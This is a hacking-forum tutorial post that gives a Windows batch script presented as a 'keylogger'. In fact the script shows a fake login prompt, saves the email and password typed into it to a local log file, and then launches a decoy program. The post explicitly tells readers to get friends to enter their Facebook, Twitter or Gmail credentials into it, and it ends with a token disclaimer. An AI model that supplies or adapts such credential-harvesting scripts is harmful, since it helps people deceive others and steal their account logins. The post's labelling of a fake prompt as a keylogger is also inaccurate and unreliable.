Hack the Site
Would you like to react to this message? Create an account in a few clicks or log in to continue.

How to create a keylogger in notepad || hacking tricks?

Go down

How to create a keylogger in notepad || hacking tricks? Empty How to create a keylogger in notepad || hacking tricks?

Post by Admin Fri Mar 27, 2015 3:54 pm

How to create a keylogger in notepad || hacking tricks? Secret1

hi friends today i am going to show you how to create a keylogger in notepad. this article is dedicated to beginners who are new to hacking world and want to know things works in hacking.i am posting this article so that we get the basic idea of keylogging. how it works and how we can create a keylogger with the help of notepad using a simple script.
before creating keylogger lets understand some basic concepts of keylogging.

what is keylogging?

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.[1] It has uses in the study of human–computer interaction. There are numerous keylogging methods, ranging from hardware and software-based approaches to acoustic analysis. read more-wiki

what are keyloggers?

A keylogger is a type of surveillance software (considered to be either software or spyware) that has the capability to record every keystroke you make to a log file, usually encrypted. A keylogger recorder can record instant messages, e-mail, and any information you type at any time using your keyboard. The log file created by the keylogger can then be sent to a specified receiver. Some keylogger programs will also record any e-mail addresses you use and Web site URLs you visit.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party. credit-.webopedia

keylogger with the help of notepad
so now we are going to create a keylogger script, just follow the steps

Step 1.
open your notepad

Step 2
now copy below code

@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd “C:\keylogs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit

Step 3.
now save it as keylogger.bat

Step 4.
now create a new folder and name it keylogs and put this folder in C drive

Note:-If the folder is not named as keylogs, then it will not work
Step 5
now open your keylogger.bat file, so now your keylogger is ready as shown below
How to create a keylogger in notepad || hacking tricks? Keylogger

>now if you put email address and password into it,it will save them in keylogs file inside C drive. so in C drive inside keylogs folder you will found a log.txt file . when you open this file you will found the exact email and password inside it that you have inserted. so now if you ask any of your friend to put his email and password (facebook,twitter,gmail etc) inside the logger.bat file then it is saved inside keylogs file. hope you like this trick. If you have any doubt ask in comment section.

Note :- this trick is only for research and ethical purpose.if you use this script for any illegal purpose then we are not responsible for it. you are responsible for any damage and misuse

Admin
Admin

Posts : 16
Join date : 2015-03-27

https://hackthesite.board-directory.net

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum